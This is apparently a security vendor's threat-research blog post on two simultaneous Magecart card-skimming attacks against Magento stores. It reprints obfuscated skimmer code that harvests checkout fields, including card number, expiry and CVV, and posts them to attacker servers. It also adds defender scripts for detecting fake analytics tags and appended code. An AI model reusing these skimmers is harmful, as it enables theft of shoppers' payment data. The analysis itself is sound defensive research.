HUMAN Research Team Uncovers New Trend in Magecart Attacks: Multiple Magecart Groups Attacking Simultaneously


November 4, 2019

Categories: Magecart

Magecart attackers are tripping over each other for your users’ data.

The HUMAN research team has recently investigated multiple Magecart attacks and has observed an interesting new trend: multiple Magecart attacks are skimming credit cards from the same sites at the same time. Each observed attack used a different technique, and the simultaneous attacks did not appear to be coordinated. There is also a larger trend emerging in which Magecart attacks are becoming more organized, with attackers sharing tools and targeting sites built on common e-commerce platforms. In some cases the groups are running attack campaigns simultaneously without realizing it, each trying to maximize reach while minimizing its level of effort.

Our research team began investigating the Magecart attack on Sixth June as soon as it was reported. When an attack is brought to our team’s attention, we delve deep into the kill chain to get insights into how the attack is evolving. As we dug deeper into this attack, we started to piece together the chain of skimmers, the hosting sites, other affected sites and the attack techniques. Additionally, we made an interesting discovery of simultaneous Magecart attacks on We have informed the website owners mentioned in this blog about their respective attacks prior to publishing this information.

In this blog, we will detail our findings on the Sixth June Magecart attack and show how we investigated the entire kill chain, leading to the discovery of the new trend of simultaneous skimming attacks on websites. The attack is an example of this trend of two attacks happening simultaneously.

The following attack chart shows the path that our research team took to discover this new trend. We started with Sixth June and found the skimming data being posted to the hostname which is also hosting the skimmer. Scanning the web for other sites posting data to, we found other sites infected by the same skimmer, including From the full analysis of, we found a second Magecart attacker injecting yet another skimmer and exfiltrating card data to, a site registered in Russia less than two months ago. The relatively short age of the domain is an indicator of its suspicious intent.


The two skimmers were completely different from each other in terms of code, obfuscation level and complexity. However, both attacks targeted Magento-based sites, used similar methods of code injection and served malicious first-party code to unsuspecting users. The Sixth June attacker directly compromised the websites with a decoy snippet that masqueraded as a Google Analytics script. The Sixth June attacker also used a much simpler loader on PexSuperstore when compared to the Sixth June attack. Here is the simple snippet variant:

<script type="text/javascript" src=""></script>

The decoy script then pulled in an obfuscated snippet that loaded the skimmer from a remote server controlled by the attacker. This direct site compromise is called a first-party attack. The second Magecart attacker also compromised the website, this time without planting a loader script: the attacker modified the first-party script that handles the checkout process and appended skimming code at the bottom of the original script.

Sixth June Magecart attack breakdown

On October 28th, Sixth June was mentioned as a new skimming victim on Twitter. The skimmer had been present on the Magento-based website for over a week before Sixth June addressed it. As noted by the first researcher, Jenkins, the malicious code did not trigger for non-US visitors or for users running Linux operating systems.

Stage 1: Skimmers compromise the website

The attacker compromised the website and added a malicious inline JavaScript snippet to its code. The exact mode of compromise could not be determined, but the attacker did modify pages served from Sixth June web servers.

Stage 2: Skimmers place a malicious inline script

An inline script was disguised as a legitimate Google Analytics tag in the source code of the website.

<!-- Google Tag Manager -->
<!-- End Google Tag Manager -->
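A defender-side check for the disguise used in this stage, added here as example code (not code from the HUMAN post or from the skimmer): it scans page HTML for "Google Tag Manager" comment blocks and flags any script URL inside them that is not served from a Google Tag Manager host. The allowlist GTM_HOSTS, the sample HTML and the lookalike hostname are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts a genuine GTM snippet references (assumption: extend if your snippet differs).
GTM_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}

# Everything between the comment markers the Sixth June loader hid behind.
BLOCK_RE = re.compile(
    r"<!--\s*Google Tag Manager\s*-->(.*?)<!--\s*End Google Tag Manager\s*-->",
    re.IGNORECASE | re.DOTALL,
)
# Script URLs given as src="..." attributes or built as string literals in the snippet.
URL_RE = re.compile(r"""(?:src\s*=\s*["']|https?:)(?P<url>[^"'\s<>]+)""", re.IGNORECASE)


def audit_gtm_blocks(html: str) -> list:
    """Return one finding per URL inside a GTM-labelled block whose host is not a
    Google Tag Manager host. An empty list means every GTM block looks genuine."""
    findings = []
    for n, block in enumerate(BLOCK_RE.finditer(html), start=1):
        for m in URL_RE.finditer(block.group(1)):
            url = m.group("url")
            host = urlparse(url).netloc.lower()
            if host not in GTM_HOSTS:
                findings.append({
                    "block": n,
                    "url": url,
                    "host": host or "(relative)",
                    "reason": "script inside a 'Google Tag Manager' block is not served by GTM",
                })
    return findings


# Constructed page: one genuine GTM snippet followed by a decoy block that pulls a
# loader from a lookalike host (placeholder domain, not the one from the incident).
SAMPLE_HTML = """
<html><head>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<!-- End Google Tag Manager -->
<!-- Google Tag Manager -->
<script type="text/javascript" src="https://cdn.magento-lookalike.example/js/loader.js"></script>
<!-- End Google Tag Manager -->
</head><body></body></html>
"""

if __name__ == "__main__":
    for finding in audit_gtm_blocks(SAMPLE_HTML):
        print(finding)
```

Run it against the HTML your servers actually emit (fetched through the same path a customer uses), since the decoy only exists on the served pages.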

Stage 3: Inline loader script loads the obfuscated skimmer script

The inline script loaded another, heavily obfuscated script from an external host on a French ASN, whose domain was registered in the Netherlands on October 4, 2019. Note the attempt to deceive by using a domain name similar to Magento. This script is a loader that decrypts and executes the embedded inner script.

(function() {
  var G0h = {};
  var Vnn = 0 * "x7fO:x89npRi=,hwb_6})F8"["charCodeAt"](17) + 1.0;
  Ag6 = "";
  var VYd = "kd:j4cPx88;*x87$H2x7f"["length"] * 0 + 1.0;
  var H1Y =
  xx = "".constructor;
  var J42 = 4.0 + "vx87gNkA3hEu|x88UzC"["length"] * 2;
  for (
    var Eqq = 0.0 + "x80D-vV8Ix8b?"["length"] * 0;
    Eqq < H1Y["l" + (88 > 29 ? "x65" : "x5e") + "" + "" + (62 > 23 ? "x6e" : "x67") + "gth"];
    Eqq += "^%Ir?|g)@d~>X,"["charCodeAt"](12) * 0 + 2.0
  ) {
    Ag6 =
      Ag6 +
      String["from" + (65 > 41 ? "x43" : "x39") + "ha" + "rCo" + (58 > 35 ? "x64" : "x5a") + "e"](
          H1Y["s" + (96 > 28 ? "x75" : "x70") + "bs" + "" + (95 > 22 ? "x74" : "x6c") + "r"](
            "A~V+YCtW0u@q{Kl?Ze2("["charCodeAt"](15) * 0 + 2.0
  VYd = "setTimeout(Ag6," + Vnn;
  VYd = VYd + ");";
  G0h["" + (98 > 24 ? "x74" : "x6b") + "oSt" + "r" + (74 > 23 ? "x69" : "x61") + "ng"] = xx[
    "con" + (85 > 5 ? "x73" : "x6a") + "truct" + "" + (87 > 5 ? "x6f" : "x67") + "r"
  s = G0h + ".";

Stage 4: Obfuscated skimmer script exfiltrates credit card data

The malicious script that was imported from loaded an inner script, also heavily obfuscated. This inner script is the skimmer itself: it registers event listeners and reads the values of all document object model (DOM) elements. The script also runs on checkout pages, which contain highly sensitive personally identifiable information (PII) and payment details.

The final formjacking script of the skimmer:

var Y6x = "7Faq'{Cic6x7f4"["length"] * 41 + 8.0;
var laV = 2.0 + ")ORx80x8b"["length"] * 85;
jQuery(document)["" + (60 > 39 ? "x72" : "x6d") + "ead" + "y"](function() {
  $(document)["" + "" + (65 > 46 ? "x6f" : "x68") + "n"](
    "M2cqlxi3scOk"["replace"](/[qsM23xO]/g, ""),
    "9xbpsuit[HtWo4n"["replace"](/[[Wxi9sH4p]/g, ""),
    function() {
      var snd = null;
      var eRr = "]YR%qxWGFZN`taVyq`nIupls"[
        (2.0 + "QO?2qG&x82U#FD"["length"] * 2457308705)["toString"](
          0 * "x820v/njrx89mu)x85=x8af,("["charCodeAt"](16) + 32.0
      ](/[YtGlIpx]%`yVZ]/g, "");
      var inp = document["" + "queryS" + (95 > 40 ? "x65" : "x60") + "lectorAll"](
        "Ji)n+pA[u<tz,1 zs0e&l6e;`cEtYH,Q wMtvIeV1x7tIfa&rNeWZa6,q; Cc4Lh0e[c2kYb@o&x"["replace"](
      for (
        var i = 0 * "JW56ax8b;Am"["length"] + 0.0;
        i < inp["" + (61 > 27 ? "x6c" : "x65") + "e" + "ngt" + (57 > 34 ? "x68" : "x62") + ""];
      ) {
        if (
          inp[i]["" + (56 > 34 ? "x76" : "x6c") + "alu" + "e"]["l" + "eng" + (87 > 29 ? "x74" : "x6f") + "h"] >
            "x89X+x82Y_G0x866tx8b'"["length"] * 0 + 0.0 &&
          inp[i]["v" + "" + (62 > 37 ? "x61" : "x5b") + "lue"]["len" + (73 > 42 ? "x67" : "x61") + "t" + "h"] <
            4 * "rx84#n[<6LDvWf."["length"] + 8.0
        ) {
          var nme = inp[i]["i" + "d"];
          if (
            nme ==
              ("bacx88Ar'E#x80"["charCodeAt"](6) * 1529811105 + 23.0)["toString"](4.0 + "6p5lzXx88+"["length"] * 4)
            ]("zIoQzIsn3f", "")
          ) {
            nme = i;
            VuS = 0 * "<vMF|:AT%x81)x82x85D"["charCodeAt"](13) + 31.0;
          snd +=
            inp[i]["" + "" + (87 > 35 ? "x69" : "x5f") + "d"] +
            "Q="["replace"](/[Q]/g, "") +
            inp[i]["" + (99 > 27 ? "x76" : "x6e") + "alu" + "e"] +
              (1625808742 * "VSNWGd@?{J+mk(L"["length"] + 3.0)["toString"](
                0 * "x8a1%rLVCx80Ug#&R)"["charCodeAt"](8) + 31.0
            ](/[`]/g, "");
          iF5 = "B`K(LNkn7SP20Vi=aUsWowrf"[
            (",-V(@cZx60vxrY;:wpD'x80<"["charCodeAt"](17) * 756094986 + 8.0)["toString"](
              32.0 + "S|RZ#3VX{CzcDx7fmj"["charCodeAt"](7) * 0
          ](/[=0k`PNiUwB7rW(]/g, "");
      if (snd != null) {
        var regexp = /(3|4|5|6)[0-9]{13,16}/gi;
        ZHq = 8.0 + "jMa.vcbkhU>x89g)x60*173"["charCodeAt"](17) * 4;
        var re = snd["" + (86 > 6 ? "x72" : "x6c") + "e" + "plac" + (54 > 48 ? "x65" : "x5c") + ""](
          / /g,
            ("a>%<Yx60_}cx89&8d"["charCodeAt"](3) * 840115113 + 29.0)["toString"](
              35.0 + "I)+=x81[Yx83kmnC/j"["charCodeAt"](3) * 0
          ]("kZeHOlnoc8", "")
        i2y = "uK_KFzXMLO@RObvak6AYdI"[
          ("ys+)xGEYmLK"["charCodeAt"](3) * 1229436751 + 18.0)["toString"](5.0 + "i%xhW#o,.IV5x81x89w"["length"] * 2)
        ](/[RXabA6FLu@d_]/g, "");
        re = re["rep" + (59 > 27 ? "x6c" : "x65") + "a" + "" + (69 > 24 ? "x63" : "x5d") + "e"](
          ""[(2.0 + "=%7qd"["length"] * 5897540892)["toString"](0.0 + "mRZ1twXK"["length"] * 4)]("REyxe9pHTw", "")
        nsS = "FtiANYFn8pvRSNmRd5r<6"["replace"](/[5p<iF8NR]/g, "");
        K96 = "GNbtHcqAWoZah4SmDZtk~j"["replace"](/[~AcS4NGDato]/g, "");
        var matches = re["" + "mat" + (99 > 12 ? "x63" : "x5c") + "h"](regexp);
        X3v = "lAdQUr9NKZMVW]7Xoh6TnG8U"[
          ("/RqciSx83hMx80x7f>|WwH"["charCodeAt"](13) * 685777392 + 14.0)["toString"](
            "c=.h6U>e@(JCSdz"["charCodeAt"](8) * 0 + 36.0
        ](/[N6]AMVrXolQ8nK]/g, "");
        if (matches != null) {
          if (qTw(matches["x88x7fQIAyo{=mX"["length"] * 0 + 0.0]) == true) {
            snd = L1l(
              snd +
                "8w&m(sehro8pG="["replace"](/[wGm(er8]/g, "") +
                window["loca" + (92 > 6 ? "x74" : "x6f") + "" + "io" + (61 > 33 ? "x6e" : "x67") + ""][
                  "" + (95 > 0 ? "x68" : "x62") + "os" + "t"
                ] +
                "MT&McvaoIr)d6_U1W2-93yz="["replace"](/[ovWT-9)MzyUI6]/g, "") +
                matches[0.0 + "]px87x86eavHO>Ls-K"["charCodeAt"](13) * 0]
            A7Z = "pA%9zkF2uWeV%JYG3`N>6v8"["replace"](/[`>peFWGv%Yz2]/g, "");
            var NmK = "vFdgd&Vs;n`2+m)ZiNFB!b"["replace"](/[;i+&F)!Vg`v]/g, "");
            var gOB = "li(rk4QyF9>L8vi=0u)eo3"[
              ("/&63uz*0Q("["charCodeAt"](9) * 886198616 + 27.0)["toString"](
                "7*T?x882YHdE>Ox84,^;6"["charCodeAt"](5) * 0 + 33.0
            ](/[F()=vLluQ>ko]/g, "");
            var Vo2 = "9zwr#lwA*7@TVWvs6<ifUC"[
              (47.0 + "(:x82D_BJ87KryM^"["charCodeAt"](8) * 644508084)["toString"](
                33.0 + "]C(:T*^@,[}Ygps?"["charCodeAt"](11) * 0
            ](/[<s*f#@WVwU9]/g, "");
            tI1 = "1#RG2(y~gt4Y72#3x8fz/s"[
              ("8x81x83N7'~X1_"["charCodeAt"](4) * 443402384 + 13.0)["toString"](
                9.0 + "x7ftq5}mJx87oMZ"["length"] * 2
            ](/[~x(/tf1GY7#]/g, "");
            NMU = "DzpnEkZPqA0pRTb9T=K5l]z"["replace"](/[9ERDP]AbZ5=p]/g, "");
            TT4 = 18.0 + "qx80p=Nv[x82%Macx7f>x8b"["charCodeAt"](9) * 2;
            var D9Q = 24.0 + "/x8ajDi<s_ux890.AQ"["charCodeAt"](13) * 0;
            var key = L1l(
              window["" + "loca" + (55 > 3 ? "x74" : "x6c") + "ion"][
                "h" + (79 > 40 ? "x6f" : "x65") + "" + "" + (65 > 12 ? "x73" : "x6d") + "t"
            qaD = "2L-;b1xesLDGJ!H3P9NrOZBS"["replace"](/[1Z9rB2!sDJ-e3;]/g, "");
            var data =
              "W`phwn7+gu="["replace"](/[+wWuh`7]/g, "") + snd + "C&cPkMe>ly~="["replace"](/[M>c~PCl]/g, "") + key;
            var Kqv = 2.0 + "Cx86$pZ"["length"] * 95;
            urll = "Q1h5tZt*pF)sL:;/2J/QKw4KwQw4.[m5o*g!eIn)t[oD.OiJHnEf8`o=/(>i4JmF#aNgJ~e%sS/(v2iXs4aH8-`~m]a+sKtTKe@r>cbZa1r!dZX-uaUm5e2xC_903.VpOnTg"[
            ](/[1Q2H!5+%>#)b~TN;K=V[u]9IE(UCFSODJ@348*LX`Z]/g, "");
            jri = "CMwi0S8gBFnr>Xzd`xKCI2ql"["replace"](/[Cz2KS0Fwgr`>q]/g, "");
            jQuery["a" + (94 > 37 ? "x6a" : "x61") + "" + "a" + (63 > 31 ? "x78" : "x73") + ""]({
              type: "pPUaOESiT"["replace"](/[iUpaE]/g, ""),
              url: urll,
              data: data,
vwj = "#-O25Vo0%qy"["charCodeAt"](4) * 3 + 47.0;
function qTw(s) {
  var v = "e0s1L2;3A4k<5/6D7]8y*9"[
    (1625808742 * "3I9gZ.x821_(x81j5ix80"["length"] + 3.0)["toString"](
      0 * "hv~7c=p>Rx89[Q"["charCodeAt"](10) + 31.0
  ](/[A<*/k;LDy]es]/g, "");
  u1J = "O2S;UcWnoEFCxnGZ~eP%(L3D"[
    ("[5Bx88/x8bfE6"["length"] * 5600767423 + 2.0)["toString"](
      "BJxx8bZ)aNDi8ux89l'x60r_*"["charCodeAt"](10) * 0 + 35.0
  ](/[SEGnOC;~e3%c(]/g, "");
  var w = ""[
    ("qx8bX/o-,"["length"] * 3483875876 + 1.0)["toString"](31.0 + "xux81XPGk7x82x88_vW"["charCodeAt"](5) * 0)
  ]("o97zIjFxdS", "");
  for (
    i = 0 * "w'nK%>:MHb1*o"["charCodeAt"](4) + 0.0;
    i < s["" + (86 > 14 ? "x6c" : "x62") + "eng" + "" + (100 > 9 ? "x74" : "x6d") + "h"];
  ) {
    x = s["c" + "" + (57 > 3 ? "x68" : "x60") + "arAt"](i);
    if (
      v["i" + "nde" + (91 > 40 ? "x78" : "x72") + "Of"](x, ":cR^qy|4;wex83U@HM0"["charCodeAt"](12) * 0 + 0.0) !=
      -(1.0 + "4IPgY"["length"] * 0)
      w += x;
    NYA = "{T$zx60C,/x802"["length"] * 45 + 4.0;
  j = w["" + "lengt" + (88 > 4 ? "x68" : "x5e") + ""] / (2.0 + "e^;],Ox89u}s|I_-8%lx84X"["charCodeAt"](18) * 0);
  var dgD = 22.0 + "b*x80nM(@g+}x60CG"["charCodeAt"](5) * 7;
  k = Math["f" + "loo" + (86 > 32 ? "x72" : "x6c") + ""](j);
  LFe = "=s8507Gl(V~m2YXBJqfTN++V"[
    (274012709 * "gUx60iYxO;9y#Zx84zx89hSE"["charCodeAt"](4) + 32.0)["toString"]("Hqx83Rjbe%"["length"] * 3 + 7.0)
  ](/[7G~8Tq=(m+B5Y]/g, "");
  m = Math["ce" + (65 > 7 ? "x69" : "x63") + "" + "l"](j) - k;
  B3t = "i4JwbuOWwR+lxFNTQUXPHSZx1"[
    ("7-5wGf%V^x88|jk}"["charCodeAt"](2) * 460134549 + 36.0)["toString"](
      31.0 + "|R6x88gx87ZlhV9PIx8aB})y"["charCodeAt"](14) * 0
  ](/[+FHxSuUOwX4iT]/g, "");
  c = "7UG{jIZcE8Kh-/x89"["charCodeAt"](13) * 0 + 0.0;
  for (i = 0.0 + "B7x80?k["["length"] * 0; i < k; i++) {
    a =
      w["" + (92 > 11 ? "x63" : "x5e") + "h" + "a" + (60 > 17 ? "x72" : "x6c") + "At"](
        i * ("PW~(a@Dn.'#i5"["length"] * 0 + 2.0) + m
      ) *
      (0 * ",)BJ4x88Yx8a*vnc"["length"] + 2.0);
    c +=
      a > "x60wqH83sQj?x87tuz2x856x%"["charCodeAt"](7) * 0 + 9.0
        ? Math["" + "floo" + (71 > 0 ? "x72" : "x68") + ""](
            a / (0 * "#yqJ9:4hu%x82x60p$x8b"["length"] + 10.0) +
              (a % (10.0 + "x7fQs=kY~tO&{x82"["charCodeAt"](5) * 0))
        : a;
  for (i = "S3x60hv|>n:]t"["length"] * 0 + 0.0; i < k + m; i++)
    c +=
      w["cha" + (100 > 48 ? "x72" : "x68") + "" + "" + (100 > 15 ? "x41" : "x3a") + "t"](
        i * ("}?5Um-x82DlC=&."["length"] * 0 + 2.0) + 1 - m
      ) *
      (0 * "R$x85n_co+%^qPx60-"["length"] + 1.0);
  return c % ("a]5V0Hvx85x80I=O-x84"["length"] * 0 + 10.0) == 0 * "&|wIgx60B0~"["length"] + 0.0;
  iw7 = "(Yow2nhGDZ#u]X_Cj~wKG"[
    ("x81~r#}tk<,sN"["length"] * 2217011921 + 2.0)["toString"]("pGwlU$(fsPR2nx80:KgOL"["charCodeAt"](18) * 0 + 31.0)
  ](/[~D]#(o_Kh2C]/g, "");
function L1l(theText) {
  output = new String();
  Niv = "?jyprx60h-x841x}fSi_x89"["charCodeAt"](13) * 3 + 31.0;
  Mdh = "o5!P>eVi5g1d9)QB7#kw~u"["replace"](/[we!)B~i>#dgo]/g, "");
  Temp = new Array();
  var bdG = "gPEh2-coLvl)]WyD*/3`ip#r"[
    (54.0 + "nTh-Bx82H+EJ"["charCodeAt"](9) * 398482492)["toString"](2 * "_x8b'iORH>zX6"["length"] + 10.0)
  ](/[)`/gvh]#y-*oiP]/g, "");
  Temp2 = new Array();
  nvC = "6J;y4~"["length"] * 21 + 4.0;
  TextSize = theText["" + "lengt" + (68 > 23 ? "x68" : "x5e") + ""];
  for (i = 0.0 + "&,*x80fs"["length"] * 0; i < TextSize; i++) {
    rnd =
      Math["r" + (70 > 31 ? "x6f" : "x69") + "" + "" + (83 > 19 ? "x75" : "x6c") + "nd"](
        Math["" + (89 > 28 ? "x72" : "x68") + "ando" + "m"]() * (24 * "@Ietl"["length"] + 2.0)
      ) +
      ("6x81HB->[k@x/.n}ey"["charCodeAt"](8) * 1 + 4.0);
    Temp[i] = theText["cha" + (75 > 28 ? "x72" : "x6c") + "" + "Co" + (66 > 19 ? "x64" : "x5d") + "eAt"](i) + rnd;
    var y$j = "c04Hx-t;jNlin+g>5VLi&OUf"[
      ("x82i?x87x60Z}w=61x85X"["charCodeAt"](8) * 978075952 + 46.0)["toString"](
        8.0 + "Rx88p{lLB%x85K'x86x5"["length"] * 2
    ](/[0;L-UV>+jl&Hnc]/g, "");
    nxo = "RlPM`sZLCzie`7ObK&3aBrk"["replace"](/[ROrzP&La`sKe]/g, "");
    gbS = "Jx7fe|O0YC:Fx81L'6o]B^?"["charCodeAt"](16) * 1 + 46.0;
    Temp2[i] = rnd;
  for (i = 0.0 + "Db#x86FU>Hg;R@"["charCodeAt"](11) * 0; i < TextSize; i++) {
    output += String["from" + (77 > 16 ? "x43" : "x3a") + "har" + "Cod" + (67 > 37 ? "x65" : "x5f") + ""](
  return output;
  cvA = "AL9)cipiSQ)a<2PB6XUg/AO"[
    ("x8b,_TrC"["length"] * 4064521855 + 3.0)["toString"](31.0 + "Okt%}QHAEUg's+"["charCodeAt"](13) * 0)
  ](/[/A6LPiQ)U<]/g, "");
CiZ = 5.0 + "l8Om;J}ID"["length"] * 47;

We also found the same exact skimmer on five other Magento-based sites including Similar skimmer loader scripts were found on 91 Magento-based sites.

Multiple Simultaneous Magecart attacks: Second Skimmer on

While examining, we noticed another suspicious post request being sent to a completely different domain:, registered in Russia. This skimmer was on the checkout page sniffing users’ PII data and sending post requests to When placing an order, the compromised first-party checkout script is called and executes the skimmer.

Related attack breakdown

Stage 1: Website compromise

The PerimeterX research team found that the skimmer script was placed on the web server owned by the company. While we don’t know the exact method used to compromise the web server, we can surmise that its security controls were bypassed to make changes to the website.

Stage 2: Placing the skimmer script

Unlike the attack on Sixth June, there is no loader script. The checkout script was modified so that the skimmer executes on every checkout, as shown below. The first 960 lines of the Magento checkout script are harmless code.

/**
 * Magento
 * This source file is subject to the Academic Free License (AFL 3.0)
 * that is bundled with this package in the file LICENSE_AFL.txt.
 * It is also available through the world-wide-web at this URL:
 * If you did not receive a copy of the license and are unable to
 * obtain it through the world-wide-web, please send an email
 * to so we can send you a copy immediately.
 * Do not edit or add to this file if you wish to upgrade Magento to newer
 * versions in the future. If you wish to customize Magento for your
 * needs please refer to for more information.
 * @category    design
 * @package     base_default
 * @copyright   Copyright (c) 2006-2014 X.commerce, Inc. (
 * @license  Academic Free License (AFL 3.0)
 */
var Checkout = Class.create();
Checkout.prototype = {
    initialize: function(accordion, urls){
        this.accordion = accordion;
        this.progressUrl = urls.progress;
        this.reviewUrl =;
        this.saveMethodUrl = urls.saveMethod;
        this.failureUrl = urls.failure;
        this.billingForm = false;
        this.shippingForm= false;
        this.syncBillingShipping = false;
        this.method = '';
        this.payment = '';
        this.loadWaiting = false;
        this.steps = ['login', 'billing', 'shipping', 'shipping_method', 'payment', 'review'];
        //We use billing as beginning step since progress bar tracks from billing
        this.currentStep = 'billing';

        this.accordion.sections.each(function(section) {
            Event.observe($(section).down('.step-title'), 'click', this._onSectionClick.bindAsEventListener(this));
        }.bind(this));

        this.accordion.disallowAccessToNextSections = true;
    },

    /**
     * Section header click handler
     * @param event
     */
    _onSectionClick: function(event) {
        var section = $(Event.element(event).up().up());
        if (section.hasClassName('allow')) {
            this.gotoSection(section.readAttribute('id').replace('opc-', ''), false);
            return false;
        }
    },

    ajaxFailure: function(){
        location.href = this.failureUrl;
    },

    reloadProgressBlock: function(toStep) {
        if (this.syncBillingShipping) {
            this.syncBillingShipping = false;

Below is part of the skimmer code added at the bottom of the original script:

var _$_a5d5=(function(i,k)
	var f=i.length;
	var n=[];
	for(var m=0;m< f;m++)
		n[m]= i.charAt(m)
	for(var m=0;m< f;m++)
		var q=k* (m+ 105)+ (k% 41322);
		var p=k* (m+ 218)+ (k% 52726);
		var o=q% f;
		var g=p% f;
		var a=n[o];
		n[o]= n[g];n[g]= a;k= (q+ p)% 1694965
	var d=String.fromCharCode(127);
	var j='';
	var c='x25';
	var h='x23x31';
	var e='x25';
	var b='x23x30';
	var l='x23';
	return n.join(j).split(c).join(d).split(h).join(e).split(b).join(l).split(d)
)("rQinuNemb%ica_pCmrimtnstAtc_%usbelncbteniacaxey#lolh%otlchot0euxlan%1itneckraiCNamdtD8gs/h-rafun%ttec#nnot0oczlc0ceCmsci%ln#kaR-i%eUh:%Ycsicdn:rcnfehke\%c0e d\cvoCme1%siiyten_elntagnoelosiasf%%uh.strsobkl%eSbma#cs#heatttmncmeCrt%hianoha_oei7t0tollr*sbeadtus4tlCoO_da%Abirp%adn_:Ce%%unTH\Pciiln\jiftsrie/12oiatbhl|crgnhg0@+fCe%o%ii%%Et%i%aai%h0zr_r#\_e7nirtp:urs%eatp0#%oxgdioga:todpN%|%%hmottc\ltelWn:8s%m#o:ibcd%gh:ti%yc#Kb%:eiega:d%ai%nikpNsg\selro00bccM2%___noeeghellrna\pposrc#l%nBrhe%siGc3:=_\bMPhfsel#i0aalYset^%%lSsTyze/iveclS%ru2to\%/exNnsg#2ye0%%stermacL%Vocl_0lev#tim%oAl%_6eFlm%Jneo%Oigro/#:tXgZdbutelgaejitanfpnri+uve%zzguiif5ec89n/|ew20lahi#pNeng0nd8cno%a#eealaonr%%kjyi%t%0eiighIitdnx0ac%_N#Cktettrp4e1cqc%deuOieun",975551);
	document[_$_a5d5[0]]= _$_a5d5[1];document[_$_a5d5[2]]= _$_a5d5[3];document[_$_a5d5[4]]= _$_a5d5[5];document[_$_a5d5[6]]= _$_a5d5[7];document[_$_a5d5[8]]= _$_a5d5[9];document[_$_a5d5[10]]= _$_a5d5[11];a();if(( new RegExp(_$_a5d5[14]))[_$_a5d5[13]](window[_$_a5d5[12]]))
	function c()
			if(jQuery(document[_$_a5d5[10]])[_$_a5d5[15]](document[_$_a5d5[8]])== false)


	function a()

	function e()
		var a;//40
		a= {Address:jQuery(_$_a5d5[19])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[21])[_$_a5d5[18]](),CCname:jQuery(_$_a5d5[22])[_$_a5d5[18]]()+ _$_a5d5[20]+ jQuery(_$_a5d5[23])[_$_a5d5[18]](),Email:jQuery(_$_a5d5[24])[_$_a5d5[18]](),Phone:jQuery(_$_a5d5[25])[_$_a5d5[18]](),Sity:jQuery(_$_a5d5[26])[_$_a5d5[18]](),State:jQuery(_$_a5d5[27])[_$_a5d5[18]](),Country:jQuery(_$_a5d5[28])[_$_a5d5[18]](),Zip:jQuery(_$_a5d5[29])[_$_a5d5[18]](),Shop:window[_$_a5d5[12]][_$_a5d5[30]],CcNumber:jQuery(document[_$_a5d5[0]])[_$_a5d5[18]](),ExpDate:jQuery(document[_$_a5d5[2]])[_$_a5d5[18]]()+ _$_a5d5[31]+ jQuery(document[_$_a5d5[4]])[_$_a5d5[18]](),Cvv:jQuery(document[_$_a5d5[6]])[_$_a5d5[18]]()};var b=JSON[_$_a5d5[32]](a);//59
		encData= d(b);jQuery[_$_a5d5[36]]({url:_$_a5d5[33],data:{main:encData},type:_$_a5d5[34],dataType:_$_a5d5[35],success:function(a)
			return false
			return false

Stage 3: Script exfiltrates credit card information

When placing an order, the compromised first-party checkout script is called and executes the skimmer. The malicious post request was traced back to this first-party script, which the attacker had modified by appending the skimming code at the bottom.
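The appended-code modification described in Stages 2 and 3 is something a site owner can catch with a content baseline of the scripts they serve. The following is added example code, not from the HUMAN post or from Magento: it hashes every .js file under a web root, persists the baseline as JSON, and on re-check distinguishes a pure append (original bytes intact, file grew) from an in-place edit, a deletion or a new file. The directory layout, file names and contents are constructed for the demo.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(root: Path) -> dict:
    """Hash every .js file under root; keep the size so appends can be recognised later."""
    return {
        str(p.relative_to(root)): {"sha256": sha256(p.read_bytes()), "size": p.stat().st_size}
        for p in sorted(root.rglob("*.js"))
    }


def check_against_baseline(root: Path, baseline: dict) -> list:
    """Compare the served tree with the baseline and classify every change."""
    findings = []
    current = {str(p.relative_to(root)): p for p in root.rglob("*.js")}
    for rel, info in baseline.items():
        path = current.get(rel)
        if path is None:
            findings.append({"file": rel, "change": "deleted"})
            continue
        data = path.read_bytes()
        if sha256(data) == info["sha256"]:
            continue
        # Original bytes intact and the file only grew: code was appended, the pattern
        # seen on the compromised checkout script. Anything else is an in-place edit.
        if len(data) > info["size"] and sha256(data[: info["size"]]) == info["sha256"]:
            tail = data[info["size"]:]
            findings.append({"file": rel, "change": "appended", "added_bytes": len(tail),
                             "preview": tail[:80].decode("utf-8", "replace")})
        else:
            findings.append({"file": rel, "change": "modified"})
    for rel in sorted(current.keys() - baseline.keys()):
        findings.append({"file": rel, "change": "new file"})
    return findings


def demo() -> list:
    """Constructed scenario: baseline a small js/ tree, persist it as JSON, then simulate
    an attacker appending a block to the checkout script and dropping a new file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        js = root / "js"
        js.mkdir()
        (js / "checkout.js").write_text("var Checkout = Class.create();\n")
        (js / "tools.js").write_text("function noop() {}\n")
        baseline_file = root / "baseline.json"
        baseline_file.write_text(json.dumps(build_baseline(root)))
        # Tampering: a placeholder block appended after the legitimate script ends.
        with (js / "checkout.js").open("a") as f:
            f.write("\nvar _$_demo = ['constructed', 'appended', 'block'];\n")
        (js / "extra.js").write_text("// constructed new file\n")
        return check_against_baseline(root, json.loads(baseline_file.read_text()))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Store the baseline outside the web root and refresh it only from a deployment you trust; a baseline regenerated from an already compromised server would silently accept the appended code.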

stage 3 pt 1

stage 3 pt 2

It was interesting to find that is related to a much larger campaign primarily targeting UmbroBrasil, a Brazilian website that was recently breached for the second time, and other lesser-known websites.

It is also worth mentioning that hosts skimmers in addition to operating as an exfiltration gateway. Here are some of the skimmers it hosts:


Skimmers hosted on appear to be named after the intended target websites. We did not find any traces of active infection on upscalestripper and galeriedebeaute, but it is safe to assume that the attackers are preparing for a future campaign.


This revelation of multiple simultaneous Magecart attacks shows that digital skimming is rapidly becoming a major threat to global e-commerce businesses. To restore user confidence, website owners should monitor and track the behavior of first- and third-party code on their sites in real time, to ensure bad actors cannot bypass their infrastructure.
